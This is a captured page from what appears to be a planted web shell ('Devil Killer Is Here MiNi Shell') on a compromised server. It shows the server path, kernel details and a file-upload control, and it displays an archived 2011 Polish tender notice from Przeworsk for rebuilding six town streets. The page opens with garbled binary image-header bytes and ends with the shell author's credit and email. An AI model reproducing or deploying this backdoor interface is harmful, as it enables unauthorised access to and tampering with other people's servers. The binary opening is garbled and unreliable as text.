JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20110204/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20110204/41439-N-2011.html

<p class="kh_header"><b>Przeworsk: Odbudowa nawierzchni drogowych ulic miejskich w Przeworsku.</b><br>
<b>Numer ogłoszenia: 41439 - 2011; data zamieszczenia: 04.02.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Burmistrz Miasta  Przeworska , ul. Jagiellońska 10, 37-200 Przeworsk, woj. podkarpackie, tel. 016 6487600, faks 016 6487600.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> http://www.przeworsk.um.gov.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Odbudowa nawierzchni drogowych ulic miejskich w Przeworsku..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest wykonanie robót budowlanych polegających na odbudowie nawierzchni
 drogowych ulic miejskich wraz z odwodnieniem korpusu drogi. Przedsięwzięcie realizowane w ramach programu pn. : Narodowy Program Przebudowy Dróg Lokalnych 2008-2011.  Zamówienie będzie obejmować ulice:
      
       Ulica Tatarska ( 110438 R ) odcinek drogi od KM 0 + 00 do KM 0 + 427 o łącznej długości odcinka remontu drogi 427  mb. o szerokości jezdni wynoszącej 5 m. Łączna powierzchnia nawierzchni asfaltowych 1.896 m 2, łączna powierzchnia remontowanych chodników z kostki brukowej 516 m 2. Projektuje się również nową organizację ruchu poprzez wprowadzenie oznakowania oznakowania poziomego oraz ustawienie 15 znaków drogowych. Jednocześnie w celu podniesienia bezpieczeństwa pieszych planuje się wprowadzić 38 m ogrodzeń ochrony łańcuchowej na skrzyżowaniu ulicy Tatarskiej z drogą powiatową ulicą Gimnazjalną ( P 1 594 R )  oraz pasa zwalniającego z kostki brukowej również przy wspomnianym skrzyżowaniu. Roboty przygotowawcze - rozebranie podbudowy z kruszywa - 831 m 2, rozebranie nawierzchni - 814 m 2, rozebranie chodników z kostki brukowej 206 m 2, rozebranie krawężników betonowych - 838 m. Roboty ziemne - wykonanie wykopów 120 m 3, wykonanie nasypów 102 m 3. Odwodnienie korpusu drogowego - studzienki ściekowe z gotowych elementów betonowych 1 szt., regulacja pionowa studzienek i kratek kanalizacyjnych 20 szt.. Podbudowy - podbudowa z kruszywa łamanego 117 m 3, wykonanie warstwy wzmacniającej podłoże z kruszywa stabilizacyjnego - 756 m 2, wyrównanie podbudowy mieszanką bitumiczną 319 ton. Nawierzchnie - wykonanie warstwy ścieralnej z betonu asfaltowego - 1.896 m 2, wykonanie chodników z kostki brukowej 516 m 2, wykonanie nawierzchni na zjazdach z kostki brukowej 322 m 2. Roboty wykończeniowe humusowanie z obsianiem skarp 346 m 2. Elementy ulic i dróg - ustawienie krawężników betonowych 784 m.

               Ulica Jasna ( 110440 R ) odcinek drogi od KM 0 + 00 do KM 0 + 486 o łącznej długości odcinka remontu drogi 486 mb o szerokości jezdni wynoszącej 5 m. Łączna powierzchnia nawierzchni asfaltowej 2.519 m 2, łączna powierzchnia remontowanych chodników z kostki brukowej 497 m 2. Projektuje się również nową organizację ruchu poprzez wprowadzenie oznakowania poziomego oraz ustawienie 12 znaków drogowych. Roboty przygotowawcze - rozebranie podbudowy z kruszywa 778 m 2, rozebranie nawierzchni 233 m 2, rozebranie chodników z kostki betonowej 661 m 2, rozebranie krawężników betonowych - 1015 m, Roboty ziemne - wykonanie wykopów 136 m 3, wykonanie nasypów 115 m 3. Odwodnienie korpusu drogowego - studzienki ściekowe z gotowych elementów betonowych 1 szt. Regulacja pionowa studzienek i kratek kanalizacyjnych - 40 szt. Podbudowa - podbudowa z kruszywa łamanego 117 m 3, wykonanie warstwy wzmacniającej podłoże z kruszywa stabilizacyjnego 766 m 2, wyrównanie podbudowy mieszanką bitumiczną 441 ton. Nawierzchnie - wykonanie warstwy ścieralnej z betonu asfaltowego 2.519 m 2, wykonanie chodników z kostki brukowej 497 m 2, wykonanie nawierzchni na zjazdach z kostki brukowej 338 m 2. Roboty wykończeniowe - humusowanie z obsianiem skarp 193 m 2, umocnienie skarp betonowymi płytami 9 m 2. Elementy ulic i dróg - ustawienie krawężników betonowych 874 m.
              Ulica Rolskiego ( 110435 R ) odcinek drogi od KM 0 + 00 do KM 0 + 300 o łącznej długości odcinka remontu drogi 300 mb o szerokości jezdni wynoszącej 6 m. Łączna powierzchnia nawierzchni asfaltowej 1.929 m 2, łączna powierzchnia remontowanych chodników z kostki brukowej 736 m 2. Projektuje się również nową organizację ruchu poprzez wprowadzenie oznakowania poziomego oraz ustawienie 12 znaków drogowych. Roboty przygotowawcze - rozebranie podbudowy z kruszywa 1.441 m 2, rozebranie nawierzchni 1.328 m 2, rozebranie chodników z kostki betonowej 61 m 2, rozebranie krawężników betonowych 477 m. Roboty ziemne - wykonanie wykopów 107 m 3, wykonanie nasypów 184 m 3. Odnowienie korpusu drogowego - studzienki ściekowe z gotowych elementów betonowych 4 szt.. Regulacja pionowa studzienek i kratek kanalizacyjnych 29 szt. Podbudowa - podbudowa z kruszywa łamanego 187 m 3, wykonanie warstwy wzmacniającej podłoże z kruszywa stabilizacyjnego 812 m 2, wyrównanie podbudowy mieszanką bitumiczną 355 ton. Nawierzchnie - wykonanie warstwy ścieralnej z betonu asfaltowego 1.929 m 2, wykonanie chodników z kostki brukowej 736 m 2, wykonanie nawierzchni na zjazdach z kostki brukowej 383 m 2. Roboty wykończeniowe - humusowanie z obsianiem skarp 283 m 2. Elementy ulic i dróg - ustawienie krawężników betonowych 758 m.
             Ulica Zielona ( 110437 R ) odcinek drogi od KM 0 + 00  do KM 0 + 400 o łącznej długości odcinka remontu drogi 400 mb o szerokości jezdni wynoszącej 3 m. Łączna powierzchni nawierzchni asfaltowej 1.354 m 2, łączna powierzchnia remontowanych chodników z kostki brukowej 136 m 2. Projektuje się również nową organizację ruchu poprzez wprowadzenie oznakowania poziomego oraz ustawienie 5 znaków drogowych. Roboty przygotowawcze - rozbieranie podbudowy z kruszywa 345 m 2, rozbieranie chodników z kostki brukowej 115 m 2, rozbieranie krawężników betonowych 616 m. Roboty ziemne - wykonanie wykopów 54 m 3, wykonanie nasypów 51 m 3. Odnowienie korpusu drogowego - studzienki ściekowe z gotowych elementów betonowych 2 szt, regulacja pionowa studzienek rewizyjnych 8 szt. Podbudowa - podbudowa z kruszywa łamanego 29 m 3, wykonanie warstwy ścieralnej z betonu asfaltowego 1.354 m 2, wykonanie chodników z kostki brukowej 136 m 2, wykonanie nawierzchni na zjazdach z kostki brukowej 160 m 2. Roboty wykończeniowe - humusowanie z obsianiem skarp 290 m 2. Elementy ulic i dróg - ustawienie krawężników betonowych 492 m.
             Ulica Polna ( 110436 R ) odcinek drogi od KM 0 + 00 do KM 0 + 300 o łącznej długości odcinka remontu drogi 300 mb o szerokości jezdni wynoszącej 3,5 m. Łączna powierzchnia nawierzchni asfaltowej 1.084 m 2. Projektuje się również nową organizację ruchu poprzez wprowadzenie oznakowania poziomego oraz ustawienie 7 znaków drogowych. W celu poprawy widoczności i bezpieczeństwa ruchu zostaną wykarczowane drzewa rosnące przy drodze. Roboty przygotowawcze - rozbieranie podbudowy z kruszywa 167 m 2, rozbieranie nawierzchni 167 m 2. Roboty ziemne - wykonanie wykopów 40 m 3, wykonanie nasypów 29 m 3. Odbudowanie korpusu drogowego - regulacja pionowa kratek i studzienek rewizyjnych 8 szt. Podbudowy - podbudowa z kruszywa łamanego 8 m 3, wykonanie warstwy wzmacniającej podłoże z kruszywa stabilizacyjnego 57 m 2, wyrównanie podbudowy z mieszankami mineralno - bitumicznymi 232 tony. Nawierzchnie - wykonanie warstwy ścieralnej z betonu asfaltowego 1.084 m 2, wykonanie nawierzchni na zjazdach z kostki brukowej 60 m 2. Roboty wykończeniowe - humusowanie z obsianiem skarp 248 m 2. Elementy ulic i dróg - ustawienie krawężników betonowych 248 m.
     Ulica Pszenna ( 110434 R ) odcinek drogi od KM 0 + 00 do KM 0 + 100 o łącznej długości odcinka remontu drogi 100 mb o szerokości 5,5 m. Łączna powierzchnia nawierzchni asfaltowej 550 m 2 . Łączna powierzchnia remontowanych chodników z kostki brukowej 175 m 2. Projektuje się również nową organizację ruchu poprzez wprowadzenie oznakowania poziomego oraz ustawienie 6 znaków drogowych. Planuje się ustawienie 14 m ogrodzeń ochrony łańcuchowej na skrzyżowaniu ulicy Pszennej z drogą krajową nr 4. Roboty przygotowawcze - rozebranie chodników z kostki betonowej 154 m 2. Roboty ziemne - wykonanie wykopów 10 m 3, wykonanie nasypów 5 m 3. Odnowienie korpusu drogowego - regulacja pionowa studzienek rewizyjnych i telefonicznych 3 szt. Podbudowy - wykonanie podbudowy z kruszywa łamanego 10 m 3, wykonanie warstwy wzmacniającej z kruszywa stabilizacyjnego 65 m 2. Nawierzchnie -  wykonanie warstwy ścieralnej z betonu asfaltowego 550 m 2 - wykonanie nawierzchni z kostki brukowej 175 m 2, wykonanie nawierzchni na zjazdach 23 m 2. Roboty wykończeniowe - humusowanie z obsianiem skarpy 16 m 2. Elementy dróg i ulic - ustawienie krawężników ulicznych z betonu 37 m 2..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający może udzielić zamówień uzupełniających o których mowa w art 67 ust. 1 pkt 6  ustawy Prawo zamówień publicznych. Warunkiem udzielenia zamówień uzupełniających będzie przyznanie przez Radę Miasta Przeworska dodatkowych środków na remonty dróg i polegać będzie na powtórzeniu tego samego rodzaju robót . Wartość robót uzupełniających nie będzie mogła przekroczyć 50% wartości realizowanego zamówienia podstawowego. Zamówienia uzupełniające będą mogły być udzielane w okresie do 3 lat od daty udzielenia zamówienia podstawowego.</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 45.23.31.40-2, 45.23.32.20-7, 45.23.32.22-1, 45.23.24.10-9.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 6.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Oferta musi być zabezpieczona wadium w wysokości 6000 zł . Wadium musi obejmować cały okres związania ofertą . Wadium należy wnieść przed terminem składania ofert.
Wadium może być wnoszone :
	a) w pieniądzu - wpłata tylko przelewem na rachunek bankowy zamawiającego w Kredyt Bank S.A.	O/Przemyśl nr 73 1500 1634 1216 3003 6644 0000 . W przypadku wniesienia wadium w pieniądzu 	przelana kwota musi znaleźć się na koncie zamawiającego nie później niż termin składania ofert.
	b) w formach niepieniężnych:
	-   w poręczeniach bankowych,
	-   w gwarancjach ubezpieczeniowych,
	- w poręczeniach udzielanych przez podmioty, o których mowa w art.6b ust.5 pkt 2 ustawy
	    z 9 listopada 2000r o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. Nr 42, poz.	
                  275 z  2007r. Wyżej wyszczególnione formy wadium muszą się znaleźć w kasie zamawiającego ul.   
                  Jagiellońska 10 nie później niż termin składania ofert.
Złożone poręczenie lub gwarancja muszą zawierać zobowiązanie zgodne z art. 46 ust.5 ustawy  Pzp</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie ma szczególnych wymagań w zakresie tego warunku.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca spełni ten warunek jeżeli wykaże że:      
w okresie ostatnich pięciu lat a jeżeli okres działalności jest krótszy to w tym okresie wykonał z należytą starannością co najmniej dwa zamówienia z zakresu budowy lub remontu dróg , w tym jedno zamówienie o wartości nie mniejszej niż 50% wartości składanej oferty, obejmujące nawierzchnie asfaltowe.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie ma szczególnych wymagań w zakresie tego warunku.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca spełni ten warunek jeżeli wykaże że:
dysponuje lub będzie dysponował co najmniej jedną osobą z uprawnieniami budowlanymi o specjalności drogi kołowe. Wskazana osoba musi  mieć aktualną przynależność do Izby Inżynierów Budownictwa i opłaconą polisę oc.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca spełni ten warunek jeżeli wykaże że:
- dysponuje środkami finansowymi w wysokości nie mniejszej niż  cena składanej oferty, lub   posiada możliwość uzyskania kredytu w tej wysokości.
- wykaże , że ma aktualną i opłaconą polisę ubezpieczeniową od odpowiedzialności cywilnej w zakresie    działalności związanej z przedmiotem zamówienia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych w zakresie niezbędnym do wykazania spełniania warunku  wiedzy i doświadczenia, wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dokumentu potwierdzającego, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Oświadczenie o wysokości środków jakimi Wykonawca dysponuje lub będzie dysponował w celu wykonania zamówienia.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający dopuszcza  możliwość zmiany umowy:
    1) w zakresie przedłużenia terminu realizacji przedmiotu zamówienia w związku z zaistnieniem warunków 	pogodowych uniemożliwiających wykonanie prac budowlanych,
   2) w zakresie przedłużenia terminu realizacji przedmiotu zamówienia w związku ze zleceniem zamówień dodatkowych, o których mowa w art. 67 ust. 1 pkt 5 ustawy Pzp o czas niezbędny  na ich wykonanie ,
       3) w zakresie przedłużenia terminu realizacji przedmiotu zamówienia z powodu zawieszenia wykonywania prac  niespowodowanych uchybieniami Wykonawcy,
4)w przypadku konieczności zastąpienia osób, które wraz z dokumentami potwierdzającymi ich kwalifikacje zostały wskazane w ofercie Wykonawcy - z powodu wystąpienia okoliczności losowych, w szczególności: śmierci, choroby, zmiany pracodawcy wskazanej osoby. W takiej sytuacji Wykonawca dostarczy pisemne oświadczenie uzasadniające konieczność dokonania takiej zmiany i wskaże w 
zamian osoby o wymaganych kwalifikacjach,
       5)  w przypadku wprowadzenia zmian przez ustawodawcę w zakresie stawek podatku od  towarów  i usług,</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.przeworsk.bip.info.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miasta Przeworska , ul. Jagiellońska 10, 37-200 Przeworsk, w dni robocze , pok 122 w godzinach 7:30 do 16:30..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 21.02.2011 godzina 10:00, miejsce: Urząd Miasta Przeworska ul. Jagiellońska 10, 37-200 Przeworsk , pok 124.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Przedsięwzięcie realizowane w ramach programu pn. : Narodowy Program Przebudowy Dróg Lokalnych 2008-2011..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com